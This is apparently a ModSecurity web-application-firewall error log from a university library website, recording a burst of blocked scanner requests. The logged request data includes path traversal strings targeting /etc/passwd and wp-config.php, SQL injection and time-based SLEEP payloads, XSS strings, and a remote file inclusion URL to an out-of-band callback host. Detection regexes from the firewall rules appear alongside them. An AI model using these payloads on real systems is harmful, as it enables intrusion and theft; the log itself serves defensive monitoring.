[Tue Aug 29 11:48:05.429181 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAj12BoAAAAa"]
[Tue Aug 29 11:48:06.384483 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAjy55kAAAAG"]
[Tue Aug 29 11:48:06.429420 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAkaDBsAAAAJ"]
[Tue Aug 29 11:48:07.816192 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAkksHcAAAAA"]
[Tue Aug 29 11:48:08.352207 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAj12CQAAAAa"]
[Tue Aug 29 11:48:09.423651 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjYrC0AAAAK"]
[Tue Aug 29 11:48:09.475514 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjM7JkAAAAT"]
[Tue Aug 29 11:48:11.352060 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkAMAoAAAAU"]
[Tue Aug 29 11:48:12.399665 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkksJgAAAAA"]
[Tue Aug 29 11:48:12.479005 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN4QAAAAL"]
[Tue Aug 29 11:48:13.443038 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "perpustakaan.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkAMB8AAAAU"]
[Tue Aug 29 11:48:13.443083 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkAMB8AAAAU"]
[Tue Aug 29 11:48:18.346768 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14ksCo-f0AAAj12DYAAAAa"]
[Tue Aug 29 11:48:18.395054 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAkGCX8AAAAE"]
[Tue Aug 29 11:48:21.556745 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lcCo-f0AAAjM7LQAAAAT"]
[Tue Aug 29 11:48:21.602988 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjYrEcAAAAK"]
[Tue Aug 29 11:48:21.698973 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjYrEwAAAAK"]
[Tue Aug 29 11:48:22.408500 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkrz7UAAAAC"]
[Tue Aug 29 11:48:23.931466 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12FUAAAAa"]
[Tue Aug 29 11:48:24.450431 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gu49bzybwx6t36.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gu49bzybwx6t36.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAkpFXoAAAAI"]
[Tue Aug 29 11:48:27.863816 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAkskrsAAAAN"]
[Tue Aug 29 11:48:31.745555 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAlQ3qEAAAAw"]
[Tue Aug 29 11:48:32.354649 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAlUldMAAAA0"]
[Tue Aug 29 11:48:33.440476 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkleyoAAAAD"]
[Tue Aug 29 11:48:35.400101 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:path: \\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pacs/nocache.php"] [unique_id "ZO14o8Co-f0AAAlUldsAAAA0"]
[Tue Aug 29 11:48:35.420347 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14o8Co-f0AAAlV8BUAAAA1"]
[Tue Aug 29 11:48:37.362018 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZO14pcCo-f0AAAkyx9YAAAAW"]
[Tue Aug 29 11:48:37.368561 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:comment: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO14pcCo-f0AAAklezcAAAAD"]
[Tue Aug 29 11:48:38.382890 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:randomId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:randomId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php"] [unique_id "ZO14psCo-f0AAAkyx9oAAAAW"]
[Tue Aug 29 11:48:40.357532 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULTPAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:RESULTPAGE: ../../../../../../../../../../../../../../../../Windows/system.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/WEBACCOUNT.CGI"] [unique_id "ZO14qMCo-f0AAAk2KXwAAAAb"]
[Tue Aug 29 11:48:43.362462 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:appno: 0 union select 98989*443131,1-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14q8Co-f0AAAlQ3rYAAAAw"]
[Tue Aug 29 11:48:43.429119 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within XML: 111112331%' union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/weixin.php"] [unique_id "ZO14q8Co-f0AAAkrz-AAAAAC"]
[Tue Aug 29 11:48:47.361030 2023] [:error] [pid 2413] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:fileName: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/servlet/snjFooterNavigationConfig"] [unique_id "ZO14r8Co-f0AAAltVYwAAAAR"]
